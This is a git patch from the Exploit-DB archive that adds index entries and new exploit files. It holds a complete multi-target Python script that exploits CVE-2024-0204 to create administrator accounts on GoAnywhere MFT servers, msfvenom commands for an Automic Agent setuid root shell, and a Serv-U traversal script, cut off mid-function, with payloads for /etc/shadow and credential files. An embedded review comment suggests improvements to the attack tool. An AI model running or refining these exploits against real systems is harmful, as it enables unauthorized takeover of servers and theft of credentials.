Dahse",remote,multiple,,2009-09-02,2014-05-06,1,CVE-2008-6992;OSVDB-48910,,,,,https://www.securityfocus.com/bid/36209/info 38049,exploits/multiple/remote/38049.txt,"Greenstone - Multiple Vulnerabilities",2012-11-23,AkaStep,remote,multiple,,2012-11-23,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/56662/info 31912,exploits/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation",2008-06-14,"Michael Gray",remote,multiple,,2014-04-09,2014-04-09,0,CVE-2008-7170;OSVDB-53482,,,,,https://www.securityfocus.com/bid/29718/info 
@@ -12508,6 +12512,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49252,exploits/multiple/webapps/49252.txt,"WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download",2020-12-14,Wadeek,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,, 33937,exploits/multiple/webapps/33937.txt,"WordPress Plugin TYPO3 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,webapps,multiple,,2010-05-05,2016-09-26,1,,,,,,https://www.securityfocus.com/bid/39926/info 52137,exploits/multiple/webapps/52137.txt,"WordPress User Registration & Membership Plugin 4.1.1 - Unauthenticated Privilege Escalation",2025-04-08,"Al Baradi Joy",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,, +52302,exploits/multiple/webapps/52302.py,"WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass",2025-05-25,"Mohammed Idrees Banyamer",webapps,multiple,,2025-05-25,2025-05-25,0,CVE-2025-2594,,,,, 37573,exploits/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",webapps,multiple,,2012-08-06,2015-07-11,1,,,,,,https://www.securityfocus.com/bid/54812/info 40134,exploits/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5341.php 40135,exploits/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php 
@@ -41375,6 +41380,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 6705,exploits/windows/local/6705.txt,"Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation",2008-10-08,"Cesar Cerrudo",local,windows,,2008-10-07,2018-12-18,1,,,2008-Churrasco.zip,,, 35936,exploits/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070)",2015-01-29,KoreLogic,local,windows,,2015-01-29,2015-01-29,0,CVE-2014-4076;OSVDB-114532;MS14-070,,,,, 37755,exploits/windows/local/37755.c,"Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",local,windows,,2015-08-15,2016-10-27,0,CVE-2014-4076;OSVDB-114532;MS14-070,,,http://www.exploit-db.com/screenshots/idlt38000/ms14-070.jpg,, +52301,exploits/windows/local/52301.c,"Microsoft Windows Server 2016 - Win32k Elevation of Privilege",2025-05-25,"Milad karimi",local,windows,,2025-05-25,2025-05-25,0,CVE-2023-29336,,,,, 43962,exploits/windows/local/43962.c,"Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation",2018-02-02,"Saar Amar",local,windows,,2018-02-02,2018-02-02,1,CVE-2018-0743,Local,,,,https://raw.githubusercontent.com/saaramar/execve_exploit/master/exploit.c 353,exploits/windows/local/353.c,"Microsoft Windows Task Scheduler (XP/2000) - '.job' (MS04-022)",2004-07-18,anonymous,local,windows,,2004-07-17,2019-03-28,1,OSVDB-7798;CVE-2004-0212;MS04-022,,,,, 38200,exploits/windows/local/38200.txt,"Microsoft Windows Task Scheduler - 'DeleteExpiredTaskAfter' File Deletion Privilege Escalation",2015-09-15,"Google Security Research",local,windows,,2015-09-15,2015-09-15,1,CVE-2015-2525;OSVDB-127204,,,,,https://code.google.com/p/google-security-research/issues/detail?id=442 
@@ -45934,6 +45940,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41073,exploits/windows/remote/41073.py,"WinaXe Plus 8.7 - Remote Buffer Overflow",2017-01-16,"Peter Baris",remote,windows,,2017-01-16,2017-01-16,1,,,,http://www.exploit-db.com/screenshots/idlt41500/screen-shot-2017-01-16-at-152056.png,http://www.exploit-db.comwinaxep.exe, 16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,, 51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,, +52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,, 30169,exploits/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,remote,windows,,2007-06-11,2013-12-10,1,CVE-2007-3201;OSVDB-41727,,,,,https://www.securityfocus.com/bid/24412/info 16529,exploits/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2007-0348;OSVDB-34315,"Metasploit Framework (MSF)",,,, 7875,exploits/windows/remote/7875.pl,"WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow",2009-01-26,"joe walko",remote,windows,21,2009-01-25,2016-09-27,1,OSVDB-51667;CVE-2009-0351,,,,, From c3b152279e29d5427af997886003f9873a9caf95 Mon Sep 17 00:00:00 2001 
From: Exploit-DB Date: Fri, 30 May 2025 00:16:26 +0000 Subject: [PATCH 5/6] DB: 2025-05-30 7 changes to exploits/shellcodes/ghdb Automic Agent 24.3.0 HF4 - Privilege Escalation Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal Campcodes Online Hospital Management System 1.0 - SQL Injection WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure --- exploits/multiple/remote/52308.py | 338 +++++++++++++++++++++++ exploits/multiple/remote/52309.txt | 13 + exploits/multiple/remote/52311.py | 408 ++++++++++++++++++++++++++++ exploits/multiple/webapps/52307.txt | 74 +++++ exploits/multiple/webapps/52312.txt | 72 +++++ exploits/windows/remote/52310.py | 85 ++++++ files_exploits.csv | 6 + 7 files changed, 996 insertions(+) create mode 100755 exploits/multiple/remote/52308.py create mode 100644 exploits/multiple/remote/52309.txt create mode 100755 exploits/multiple/remote/52311.py create mode 100644 exploits/multiple/webapps/52307.txt create mode 100644 exploits/multiple/webapps/52312.txt create mode 100755 exploits/windows/remote/52310.py diff --git a/exploits/multiple/remote/52308.py b/exploits/multiple/remote/52308.py new file mode 100755 index 000000000..8c18d1786 --- /dev/null +++ b/exploits/multiple/remote/52308.py 
@@ -0,0 +1,338 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# Exploit Title: Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass +# Date: 2025-05-25 +# Exploit Author: @ibrahimsql +# Exploit Author's github: https://github.com/ibrahimsql +# Vendor Homepage: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft +# Software Link: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft/free-trial +# Version: < 7.4.1 +# Tested on: Kali Linux 2024.1 +# CVE: CVE-2024-0204 +# Description: +# Fortra GoAnywhere MFT versions prior to 7.4.1 contain a critical authentication bypass vulnerability +# that allows unauthenticated attackers to create an administrator account by exploiting a path traversal +# vulnerability to access the initial account setup wizard. This exploit demonstrates two different +# path traversal techniques to maximize successful exploitation across various server configurations. +# +# References: +# - https://old.rapid7.com/blog/post/2024/01/23/etr-cve-2024-0204-critical-authentication-bypass-in-fortra-goanywhere-mft/ +# - https://www.tenable.com/blog/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-vulnerability +# - https://nvd.nist.gov/vuln/detail/cve-2024-0204 + +import argparse +import concurrent.futures +import os +import socket +import sys +from typing import List, Dict, Tuple, Optional, Union + +import requests +from bs4 import BeautifulSoup +from colorama import Fore, Style, init + +# Initialize colorama for cross-platform colored output +init(autoreset=True) + +# Disable SSL warnings +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) + +# Constants +DEFAULT_TIMEOUT = 10 +MAX_THREADS = 10 +USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" +PRIMARY_EXPLOIT_PATH = "/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml" +SECONDARY_EXPLOIT_PATH = 
"/goanywhere/..;/wizard/InitialAccountSetup.xhtml" + + +class Banner: + @staticmethod + def show(): + banner = f"""{Fore.CYAN} + ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ +██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ██╔═████╗╚════██╗██╔═████╗██║ ██║ +██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗██║██╔██║ █████╔╝██║██╔██║███████║ +██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝████╔╝██║██╔═══╝ ████╔╝██║╚════██║ +╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ╚██████╔╝███████╗╚██████╔╝ ██║ + ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚═╝ +{Style.RESET_ALL} +{Fore.GREEN}CVE-2024-0204 Exploit v1.0{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql{Style.RESET_ALL} +""" + print(banner) + + +class GoAnywhereExploit: + def __init__(self, username: str, password: str, timeout: int = DEFAULT_TIMEOUT): + self.username = username + self.password = password + self.timeout = timeout + self.headers = {"User-Agent": USER_AGENT} + self.vulnerable_targets = [] + self.non_vulnerable_targets = [] + self.error_targets = [] + + def check_target(self, target: str) -> Dict: + """ + Check if target is vulnerable to CVE-2024-0204 and attempt to create an admin account + + Args: + target: The target URL/domain to check + + Returns: + Dict containing result information + """ + result = { + "target": target, + "vulnerable": False, + "message": "", + "admin_created": False, + "error": None + } + + # Try primary exploit path first + primary_result = self._try_exploit_path(target, PRIMARY_EXPLOIT_PATH) + if primary_result["vulnerable"]: + return primary_result + + # If primary path failed, try secondary exploit path + print(f"{Fore.BLUE}[*] {Style.RESET_ALL}Primary exploit path failed, trying alternative path...") + secondary_result = self._try_exploit_path(target, SECONDARY_EXPLOIT_PATH) + if secondary_result["vulnerable"]: + return secondary_result + + # If both 
paths failed, target is not vulnerable + print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Not vulnerable to CVE-2024-0204") + result["message"] = "Not vulnerable to CVE-2024-0204" + self.non_vulnerable_targets.append(target) + return result + + def _try_exploit_path(self, target: str, exploit_path: str) -> Dict: + """ + Try to exploit the target using a specific exploit path + + Args: + target: Target to exploit + exploit_path: Path to use for exploitation + + Returns: + Dict with exploitation results + """ + result = { + "target": target, + "vulnerable": False, + "message": "", + "admin_created": False, + "error": None + } + + try: + url = f"https://{target}{exploit_path}" + session = requests.Session() + + # Initial check for vulnerability + response = session.get( + url, + headers=self.headers, + verify=False, + timeout=self.timeout + ) + + # Determine if target is vulnerable based on response + if response.status_code == 401: + print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Not vulnerable via {exploit_path} (401 Unauthorized)") + result["message"] = "Not vulnerable (401 Unauthorized)" + return result + + if response.status_code != 200: + print(f"{Fore.YELLOW}[?] {Style.RESET_ALL}{target} - Unexpected response via {exploit_path} (Status: {response.status_code})") + result["message"] = f"Unexpected response (Status: {response.status_code})" + return result + + # Target is potentially vulnerable + print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{target} - Potentially vulnerable via {exploit_path}!") + result["vulnerable"] = True + self.vulnerable_targets.append(target) + + # Extract ViewState token for the form submission + try: + soup = BeautifulSoup(response.text, "html.parser") + view_state = soup.find('input', {'name': 'javax.faces.ViewState'}) + + if not view_state or not view_state.get('value'): + print(f"{Fore.YELLOW}[!] 
{Style.RESET_ALL}{target} - Could not extract ViewState token via {exploit_path}") + result["message"] = "Could not extract ViewState token" + return result + + # Prepare data for admin account creation + data = { + "j_id_u:creteAdminGrid:username": self.username, + "j_id_u:creteAdminGrid:password_hinput": self.password, + "j_id_u:creteAdminGrid:password": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2", + "j_id_u:creteAdminGrid:confirmPassword_hinput": self.password, + "j_id_u:creteAdminGrid:confirmPassword": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2", + "j_id_u:creteAdminGrid:submitButton": "", + "createAdminForm_SUBMIT": 1, + "javax.faces.ViewState": view_state['value'] + } + + # Attempt to create admin account + create_response = session.post( + url, + headers=self.headers, + data=data, + verify=False, + timeout=self.timeout + ) + + if create_response.status_code == 200: + print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{target} - Admin account created successfully via {exploit_path}! Username: {self.username}, Password: {self.password}") + result["admin_created"] = True + result["message"] = f"Admin account created successfully! Username: {self.username}, Password: {self.password}" + else: + print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Failed to create admin account via {exploit_path} (Status: {create_response.status_code})") + result["message"] = f"Failed to create admin account (Status: {create_response.status_code})" + + except Exception as e: + print(f"{Fore.RED}[!] {Style.RESET_ALL}{target} - Error extracting form data: {str(e)}") + result["message"] = f"Error extracting form data: {str(e)}" + result["error"] = str(e) + + except requests.exceptions.ConnectTimeout: + print(f"{Fore.YELLOW}[!] 
{Style.RESET_ALL}{target} - Connection timeout") + result["message"] = "Connection timeout" + result["error"] = "Connection timeout" + self.error_targets.append(target) + + except requests.exceptions.ConnectionError: + print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Connection error") + result["message"] = "Connection error" + result["error"] = "Connection error" + self.error_targets.append(target) + + except Exception as e: + print(f"{Fore.RED}[!] {Style.RESET_ALL}{target} - Error: {str(e)}") + result["message"] = f"Error: {str(e)}" + result["error"] = str(e) + self.error_targets.append(target) + + return result + + def scan_targets(self, targets: List[str]) -> None: + """ + Scan multiple targets concurrently + + Args: + targets: List of targets to scan + """ + with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_THREADS) as executor: + executor.map(self.check_target, targets) + + def load_targets_from_file(self, file_path: str) -> List[str]: + """ + Load targets from a file + + Args: + file_path: Path to the file containing targets + + Returns: + List of targets + """ + if not os.path.exists(file_path): + print(f"{Fore.RED}[!] {Style.RESET_ALL}File not found: {file_path}") + return [] + + try: + with open(file_path, "r") as f: + return [line.strip() for line in f if line.strip()] + except Exception as e: + print(f"{Fore.RED}[!] {Style.RESET_ALL}Error reading file: {str(e)}") + return [] + + def print_summary(self) -> None: + """Print a summary of the scanning results""" + print(f"\n{Fore.CYAN}[*] {Style.RESET_ALL}Scan Summary:") + print(f"{Fore.GREEN}[+] {Style.RESET_ALL}Vulnerable targets: {len(self.vulnerable_targets)}") + print(f"{Fore.RED}[-] {Style.RESET_ALL}Non-vulnerable targets: {len(self.non_vulnerable_targets)}") + print(f"{Fore.YELLOW}[!] 
{Style.RESET_ALL}Error targets: {len(self.error_targets)}") + + if self.vulnerable_targets: + print(f"\n{Fore.GREEN}[+] {Style.RESET_ALL}Vulnerable targets:") + for target in self.vulnerable_targets: + print(f" - {target}") + + +def validate_args(args): + """Validate command line arguments""" + if not args.target and not args.file: + print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: You must specify either a target (-t) or a file (-f)") + return False + + if args.file and not os.path.exists(args.file): + print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: File not found: {args.file}") + return False + + if not args.username or not args.password: + print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: You must specify both username (-u) and password (-p)") + return False + + return True + + +def main(): + """Main function""" + parser = argparse.ArgumentParser(description="CVE-2024-0204: Fortra GoAnywhere MFT Authentication Bypass Exploit") + + parser.add_argument('-t', '--target', help="Target host to check (e.g., 'example.com' or '192.168.1.1')") + parser.add_argument('-f', '--file', help="File containing targets, one per line") + parser.add_argument('-u', '--username', help="Username for the admin account to create") + parser.add_argument('-p', '--password', help="Password for the admin account to create") + parser.add_argument('--timeout', type=int, default=DEFAULT_TIMEOUT, help=f"Connection timeout in seconds (default: {DEFAULT_TIMEOUT})") + parser.add_argument('--threads', type=int, default=MAX_THREADS, help=f"Number of concurrent threads for scanning (default: {MAX_THREADS})") + + args = parser.parse_args() + + # Show banner + Banner.show() + + # Validate arguments + if not validate_args(args): + parser.print_help() + sys.exit(1) + + # Initialize exploit + exploit = GoAnywhereExploit( + username=args.username, + password=args.password, + timeout=args.timeout + ) + + # Handle single target + if args.target: + print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Checking single target: 
{args.target}") + exploit.check_target(args.target) + + # Handle targets from file + elif args.file: + targets = exploit.load_targets_from_file(args.file) + if not targets: + print(f"{Fore.RED}[!] {Style.RESET_ALL}No valid targets found in the file") + sys.exit(1) + + print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Loaded {len(targets)} targets from file") + print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Starting scan with {args.threads} threads...\n") + + exploit.scan_targets(targets) + + # Print summary + exploit.print_summary() + + +if __name__ == "__main__": + try: + main() + except KeyboardInterrupt: + print(f"\n{Fore.YELLOW}[!] {Style.RESET_ALL}Scan interrupted by user") + sys.exit(0) + except Exception as e: + print(f"{Fore.RED}[!] {Style.RESET_ALL}Unhandled error: {str(e)}") + sys.exit(1) \ No newline at end of file diff --git a/exploits/multiple/remote/52309.txt b/exploits/multiple/remote/52309.txt new file mode 100644 index 000000000..81d4d1c33 --- /dev/null +++ b/exploits/multiple/remote/52309.txt @@ -0,0 +1,13 @@ +# Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation +# Date: 26.05.2025 +# Exploit Author: Flora Schäfer +# Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation +# Version: <24.3.0 HF4, <21.0.13 HF1 +# Tested on: Linux +# CVE : CVE-2025-4971 + +1. Generate shared object file using msfvenom +$ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so + +2. Run the ucxjlx6 executable as follows +$ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep") \ No newline at end of file diff --git a/exploits/multiple/remote/52311.py b/exploits/multiple/remote/52311.py new file mode 100755 index 000000000..28be25c70 --- /dev/null +++ b/exploits/multiple/remote/52311.py 
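Review bot: `scan_targets` hard-codes `max_workers=MAX_THREADS`, so the `--threads` option parsed in `main` is echoed in the "Starting scan with {args.threads} threads" message but never applied. Change the signature to `def scan_targets(self, targets: List[str], max_workers: int = MAX_THREADS) -> None:`, use `concurrent.futures.ThreadPoolExecutor(max_workers=max_workers)`, and call `exploit.scan_targets(targets, args.threads)` from `main`. Separately, `_try_exploit_path` appends the host to `self.vulnerable_targets` and sets `result["vulnerable"] = True` as soon as the traversal URL answers HTTP 200, before the `javax.faces.ViewState` field is located, so a deployment that returns 200 with any generic page is counted as vulnerable in `print_summary`; moving that append under the successful ViewState extraction, or keying the summary on `admin_created`, would make the report reflect what was actually confirmed. The header also omits the third-party requirements (`bs4`, `colorama`) that the sibling 52311.py declares in its `# Requirements:` line.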
@@ -0,0 +1,408 @@ +# Exploit Title: SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal +# Date: 2025-05-28 +# Exploit Author: @ibrahimsql +# Exploit Author's github: https://github.com/ibrahimsql +# Vendor Homepage: https://www.solarwinds.com/serv-u-managed-file-transfer-server +# Software Link: https://www.solarwinds.com/serv-u-managed-file-transfer-server/registration +# Version: <= 15.4.2 HF1 +# Tested on: Kali Linux 2024.1 +# CVE: CVE-2024-28995 +# Description: +# SolarWinds Serv-U was susceptible to a directory traversal vulnerability that would allow +# attackers to read sensitive files on the host machine. This exploit demonstrates multiple +# path traversal techniques to access Serv-U log files and other system files on both +# Windows and Linux systems. +# +# References: +# - https://nvd.nist.gov/vuln/detail/cve-2024-28995 +# - https://www.rapid7.com/blog/post/2024/06/11/etr-cve-2024-28995-trivially-exploitable-information-disclosure-vulnerability-in-solarwinds-serv-u/ +# - https://thehackernews.com/2024/06/solarwinds-serv-u-vulnerability-under.html + +# Requirements: urllib3>=1.26.0 , colorama>=0.4.4 , requests>=2.25.0 + + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import argparse +import concurrent.futures +import json +import os +import re +import sys +import time +from concurrent.futures import ThreadPoolExecutor, as_completed +from urllib.parse import urlparse + +import requests +from colorama import Fore, Back, Style, init + +# Initialize colorama +init(autoreset=True) + +# Disable SSL warnings +try: + import urllib3 + urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) +except ImportError: + pass + +BASE_DIR = os.path.dirname(os.path.abspath(__file__)) + +BANNER = rf''' +{Fore.CYAN} + ______ _______ ____ ___ ____ _ _ ____ ___ ___ ___ ____ + / ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \( _ )/ _ \ / _ \| ___| + | | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) / _ \ (_) | (_) |___ \ + | |___ \ V / | |__|_____/ __/| 
|_| / __/|__ _|_____/ __/ (_) \__, |\__, |___) | + \____| \_/ |_____| |_____|\___/_____| |_| |_____\___/ /_/ /_/|____/ +{Fore.YELLOW} + SolarWinds Serv-U Directory Traversal Exploit +{Fore.RED} CVE-2024-28995 by @ibrahimsql +{Style.RESET_ALL} +''' + +class ScanResult: + def __init__(self, url, is_vulnerable=False, version=None, os_type=None, file_content=None, path=None): + self.url = url + self.is_vulnerable = is_vulnerable + self.version = version + self.os_type = os_type + self.file_content = file_content + self.path = path + self.timestamp = time.strftime("%Y-%m-%d %H:%M:%S") + + def to_dict(self): + return { + "url": self.url, + "is_vulnerable": self.is_vulnerable, + "version": self.version, + "os_type": self.os_type, + "path": self.path, + "timestamp": self.timestamp + } + +def print_banner(): + print(BANNER) + +def normalize_url(url): + """Normalize URL to ensure it has http/https protocol.""" + if not url.startswith('http'): + url = f"https://{url}" + return url.rstrip('/') + +def extract_server_version(headers): + """Extract Serv-U version from server headers if available.""" + if 'Server' in headers: + server_header = headers['Server'] + # Look for Serv-U version pattern + match = re.search(r'Serv-U/(\d+\.\d+\.\d+)', server_header) + if match: + return match.group(1) + return None + +def is_vulnerable_version(version): + """Check if the detected version is vulnerable (15.4.2 HF1 or lower).""" + if not version: + return None + + try: + # Split version numbers + major, minor, patch = map(int, version.split('.')) + + # Vulnerable if lower than 15.4.2 HF2 + if major < 15: + return True + elif major == 15: + if minor < 4: + return True + elif minor == 4: + if patch <= 2: # We're assuming patch 2 is 15.4.2 HF1 which is vulnerable + return True + except: + pass + + return False + +def get_request(url, timeout=15): + """Make a GET request to the specified URL.""" + try: + response = requests.get(url, verify=False, timeout=timeout, allow_redirects=False) + return 
response + except requests.RequestException as e: + return None + +def detect_os_type(content): + """Detect the operating system type from the file content.""" + if any(indicator in content for indicator in ["root:", "bin:x:", "daemon:", "/etc/", "/home/", "/var/"]): + return "Linux" + elif any(indicator in content for indicator in ["[fonts]", "[extensions]", "[Mail]", "Windows", "ProgramData", "Program Files"]): + return "Windows" + return None + +def get_default_payloads(): + """Return a list of directory traversal payloads specific to CVE-2024-28995.""" + return [ + # Windows payloads - Serv-U specific files + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log"}, + {"path": "/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/^&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt"}, + {"path": "/?InternalDir=\\..\\..\\..\\..\\ProgramData\\RhinoSoft\\Serv-U\\&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt2"}, + {"path": "/?InternalDir=../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt3"}, + {"path": "/?InternalDir=../../../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Deep"}, + + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUStartupLog.txt", "name": "Serv-U Startup Log Alt4"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U.Log", "name": "Serv-U Log"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServULog.txt", "name": "Serv-U Log Alt"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUErrorLog.txt", "name": "Serv-U Error Log"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-ErrorLog.txt", "name": "Serv-U Error Log Alt"}, + {"path": 
"/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U.ini", "name": "Serv-U Config"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUAdmin.ini", "name": "Serv-U Admin Config"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/Users/&InternalFile=Users.txt", "name": "Serv-U Users"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/Users/&InternalFile=UserAccounts.txt", "name": "Serv-U User Accounts"}, + + # Verify Windows with various system files + {"path": "/?InternalDir=/../../../../windows&InternalFile=win.ini", "name": "Windows ini"}, + {"path": "/?InternalDir=\\..\\..\\..\\..\\windows&InternalFile=win.ini", "name": "Windows ini Alt"}, + {"path": "/?InternalDir=../../../../windows&InternalFile=win.ini", "name": "Windows ini Alt2"}, + {"path": "/?InternalDir=../../../../../../windows&InternalFile=win.ini", "name": "Windows ini Deep"}, + {"path": "/?InternalDir=/./../../../Windows/system.ini", "name": "Windows system.ini"}, + {"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=drivers.ini", "name": "Windows drivers.ini"}, + {"path": "/?InternalDir=/./../../../Windows/System32/drivers/etc/&InternalFile=hosts", "name": "Windows hosts"}, + {"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=config.nt", "name": "Windows config.nt"}, + {"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=ntuser.dat", "name": "Windows ntuser.dat"}, + {"path": "/?InternalDir=/./../../../Windows/boot.ini", "name": "Windows boot.ini"}, + + # Verify Linux with various system files + {"path": "/?InternalDir=\\..\\..\\..\\..\\etc&InternalFile=passwd", "name": "Linux passwd"}, + {"path": "/?InternalDir=/../../../../etc^&InternalFile=passwd", "name": "Linux passwd Alt"}, + {"path": "/?InternalDir=\\..\\..\\..\\..\\etc/passwd", "name": "Linux passwd Alt2"}, + {"path": "/?InternalDir=../../../../etc&InternalFile=passwd", "name": "Linux passwd Alt3"}, + 
{"path": "/?InternalDir=../../../../../../etc&InternalFile=passwd", "name": "Linux passwd Deep"}, + {"path": "/?InternalDir=/./../../../etc/&InternalFile=shadow", "name": "Linux shadow"}, + {"path": "/?InternalDir=/./../../../etc/&InternalFile=hosts", "name": "Linux hosts"}, + {"path": "/?InternalDir=/./../../../etc/&InternalFile=hostname", "name": "Linux hostname"}, + {"path": "/?InternalDir=/./../../../etc/&InternalFile=issue", "name": "Linux issue"}, + {"path": "/?InternalDir=/./../../../etc/&InternalFile=os-release", "name": "Linux os-release"} + ] + +def create_custom_payload(directory, filename): + """Create a custom payload with the specified directory and filename.""" + # Try both encoding styles + payloads = [ + {"path": f"/?InternalDir=/./../../../{directory}&InternalFile=(unknown)", "name": f"Custom (unknown)"}, + {"path": f"/?InternalDir=/../../../../{directory}^&InternalFile=(unknown)", "name": f"Custom (unknown) Alt"}, + {"path": f"/?InternalDir=\\..\\..\\..\\..\\{directory}&InternalFile=(unknown)", "name": f"Custom (unknown) Alt2"} + ] + return payloads + +def load_wordlist(wordlist_path): + """Load custom paths from a wordlist file.""" + payloads = [] + try: + with open(wordlist_path, 'r') as f: + for line in f: + line = line.strip() + if line and not line.startswith('#'): + # Check if the line contains a directory and file separated by a delimiter + if ':' in line: + directory, filename = line.split(':', 1) + payloads.extend(create_custom_payload(directory, filename)) + else: + # Assume it's a complete path + payloads.append({"path": line, "name": f"Wordlist: {line[:20]}..."}) + return payloads + except Exception as e: + 